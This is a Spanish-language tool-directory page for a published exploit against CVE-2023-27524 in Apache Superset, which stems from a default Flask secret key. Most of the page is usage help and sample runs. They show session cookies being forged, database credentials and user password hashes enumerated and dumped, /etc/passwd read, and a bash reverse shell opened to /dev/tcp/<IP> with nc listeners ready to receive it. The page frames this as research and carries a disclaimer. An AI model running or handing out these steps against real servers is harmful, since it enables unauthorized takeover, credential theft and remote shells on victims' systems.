Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-27524-Apache-Superset-Auth-Bypass-and-RCE — Exploit para CVE-2023-27524 que apunta al bypass de autenticación y RCE en Apache Superset. Forja cookies de sesión, enumera bases de datos/usuarios, ejecuta comandos del sistema operativo y abre shells inversas en instancias vulnerables. | Kitploit
Herramientas/GitHubGitHub/jakabakos/cve-2023-27524-apache-superset-auth-bypass-and-rce
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlHerramienta de Acceso RemotoSeguridad de Bases de Datos

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
GitHub
jakabakos/cve-2023-27524-apache-superset-auth-bypass-and-rce

CVE-2023-27524-Apache-Superset-Auth-Bypass-and-RCE

Exploit para CVE-2023-27524 que apunta al bypass de autenticación y RCE en Apache Superset. Forja cookies de sesión, enumera bases de datos/usuarios, ejecuta comandos del sistema operativo y abre shells inversas en instancias vulnerables.

Ver Repositorio
28832hace 2 añosRevisado por Kitploit
Compartir

CVE-2023-27524: Bypass de autenticación y RCE en Apache Superset

Apache Superset, una herramienta de código abierto ampliamente utilizada para la visualización y exploración de datos, presenta posibles debilidades de seguridad que podrían provocar la omisión de autenticación y la ejecución remota de código (RCE). Estas vulnerabilidades podrían permitir a actores malintencionados obtener privilegios administrativos en los servidores objetivo, permitiéndoles recopilar credenciales de usuario y potencialmente comprometer los datos.

El problema de seguridad específico en cuestión es una vulnerabilidad de configuración predeterminada insegura conocida como CVE-2023-27524.

La causa raíz reside en la clave secreta de Flask predecible establecida durante la instalación, lo que afecta a un número considerable de instancias expuestas de Apache Superset. Aunque se han realizado algunos esfuerzos de mitigación, esta vulnerabilidad sigue siendo una preocupación crítica para quienes no han actualizado sus configuraciones.

El problema puede escalarse a RCE. Este exploit añade esta funcionalidad al original.

Descripción oficial de la vulnerabilidad:

Los ataques de validación de sesión en versiones de Apache Superset hasta la 2.0.1 inclusive. Las instalaciones que no hayan modificado la SECRET_KEY configurada por defecto según las instrucciones de instalación permiten a un atacante autenticarse y acceder a recursos no autorizados. Esto no afecta a los administradores de Superset que hayan cambiado el valor predeterminado de la configuración SECRET_KEY.

Entrada de blog

Este script de exploit está escrito para un análisis de CVE en vsociety.

Uso

Instalar paquetes PIP:

root@kitploit:~
pip3 install -r requirements.txt                                                                

Uso:

root@kitploit:~
usage: exploit.py [-h] --url URL [--id ID] [--wordlist WORDLIST] [--validate] [--enum-dbs] [--enum-users] [--cmd CMD]
                  [--revshell REVSHELL] [--db-host]

options:
  -h, --help            show this help message and exit
  --url URL, -u URL     Host URL
  --id ID               User ID to forge session cookie for. Default=1
  --wordlist WORDLIST, -w WORDLIST
                        Specify a wordlist file (default is 10.txt)
  --validate, -v        Validate the presence of vulnerability by login attempt
  --enum-dbs, -dbs      Enumerate databases
  --enum-users, -eu     Enumerate databases
  --cmd CMD, -c CMD     Run custom OS command on the database's server.
  --revshell REVSHELL   Specify IP:Port for reverse shell
  --db-host             Run commands or open reverse shell on the database server

Ejemplos

Validar la vulnerabilidad e intentar descifrar la clave secreta de la aplicación con una lista de palabras personalizada

root@kitploit:~
# python3 exploit.py --url http://localhost:8088 -v -w 10k_most_common_passwords.txt 
[+] Session cookie found.
[+] Decoded session cookie: <REDACTED>
[+] Using '10k_most_common_passwords.txt' as a wordlist.
[+] Superset instance is VULNERABLE to CVE-2023-27524.
[+] Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'
[+] Forged session cookie for user 1: <REDACTED>
[+] Superset Version: 2.0.1
[+] Login successful. Vulnerability is validated.

Enumerar bases de datos

root@kitploit:~
# python3 exploit.py -u http://localhost:8088 --enum-dbs      
[+] Session cookie found.
[+] Decoded session cookie:
    {'csrf_token': '5d4c9ad6caf94bc1c652b0fc8e8739d19c45c05a', 'locale': 'en'}
[+] Using default secret keys.
[+] Superset instance is VULNERABLE to CVE-2023-27524.
[+] Secret key found: "b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'"
[+] Forged session cookie for user 1:
    eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsQ6Q.nKTBZiUq-Cu0iWSLQIUtB2W9HnM
[+] Version 2.0.1 seems vulnerable.
[+] Enumerating databases via API...
[+] Found database: "examples" with password "superset".
[+] Found database: "SQLite".
[+] Enumerating database connection data and cracking password if possible...
+-----------------+---------------------------------------------------+--------------------------+----------------------+
| database_name   | sqlalchemy_uri                                    | password                 | decrypted_password   |
|-----------------+---------------------------------------------------+--------------------------+----------------------|
| examples        | postgresql://superset:XXXXXXXXXX@db:5432/superset | MAqp6AIikZpDM5bMH4MMgA== | superset********     |
| SQLite          | sqlite+pysqlite:////app/superset_home/superset.db |                          |                      |
+-----------------+---------------------------------------------------+--------------------------+----------------------+
[+] Process of enumerating databases finished.

Enumerar usuarios de Superset

root@kitploit:~
# python3 exploit.py -u http://localhost:8088 --enum-users              
[+] Session cookie found.
[+] Decoded session cookie:
    {'csrf_token': '2a3adb09bac36c330a77c74da1cca27c431779e8', 'locale': 'en'}
[+] Using default secret keys.
[+] Superset instance is VULNERABLE to CVE-2023-27524.
[+] Secret key found: "b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'"
[+] Forged session cookie for user 1:
    eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsRCQ.qeci7JgO5Lb4AwexB0Qojp5RDbs
[+] Version 2.0.1 seems vulnerable.
[+] Checking existing metadata database connection...
[+] Settings of database with id 1 were successfully modified.
[+] Settings of database with id 2 were successfully modified.
[+] Superset metadata connection is already added with id 2.
[+] Trying to enumerate Superset users...
[+] RESULT:
+------------+--------------------------------------------------------------------------------------------------------+
| username   | password                                                                                               |
|------------+--------------------------------------------------------------------------------------------------------|
| admin      | pbkdf2:sha256:260000$z5y5YnluWzyx4kd2$33c40dfefdea9aedef6ed171a941492516ba49c1ed8ed740d7e05446ce639c0e |
+------------+--------------------------------------------------------------------------------------------------------+

Ejecutar un comando personalizado del sistema operativo

En el servidor de Superset:

root@kitploit:~
# python3 exploit.py --url http://localhost:8088 --cmd 'bash -i >& /dev/tcp/<IP>/4242 0>&1'

Ten en cuenta que en este caso la salida no se puede ver todavía.

En el servidor de la base de datos:

root@kitploit:~
# python3 exploit.py -u http://localhost:8088 --cmd 'cat /etc/passwd' --db-host

[+] Session cookie found.
[+] Decoded session cookie:
    {'csrf_token': 'c2154d7077f507bd69c791f9d6de49115ba290a3', 'locale': 'en'}
[+] Using default secret keys.
[+] Superset instance is VULNERABLE to CVE-2023-27524.
[+] Secret key found: "b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'"
[+] Forged session cookie for user 1:
    eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsRMw.haTjE2XBuVjamMvsdg7SemBr3Ig
[+] Version 2.0.1 seems vulnerable.
[+] Trying to run command on the database server...
[+] Settings of database with id 1 were successfully modified.
[+] $ cat /etc/passwd
+-----------------------------------------------------------------------------------+
| cmd_output                                                                        |
|-----------------------------------------------------------------------------------|
| root:x:0:0:root:/root:/bin/bash                                                   |
| daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin                                   |
| <REDACTED>                                                                        |
| postgres:x:999:999::/var/lib/postgresql:/bin/bash                                 |
+-----------------------------------------------------------------------------------+

Abrir una reverse shell

En el servidor de Superset:

root@kitploit:~
# Terminal 1
nc -lvnp [PORT]

# Terminal 2
python3 exploit.py -u http://localhost:8088 --revshell [IP]:[PORT]

En el servidor de la base de datos:

root@kitploit:~
# Terminal 1
nc -lvnp [PORT]

# Terminal 2
python3 exploit.py -u http://localhost:8088 --revshell [IP]:[PORT] --db-host

Descargo de responsabilidad

Este script de exploit ha sido creado únicamente con fines de investigación y para el desarrollo de técnicas defensivas eficaces. No está pensado para ser utilizado en actividades maliciosas o no autorizadas. El autor y el propietario del script rechazan cualquier responsabilidad por el mal uso o los daños causados por este software. Se insta a los usuarios a utilizar este software de forma responsable y únicamente de acuerdo con las leyes y regulaciones aplicables. Úselo con responsabilidad.

Descargar herramienta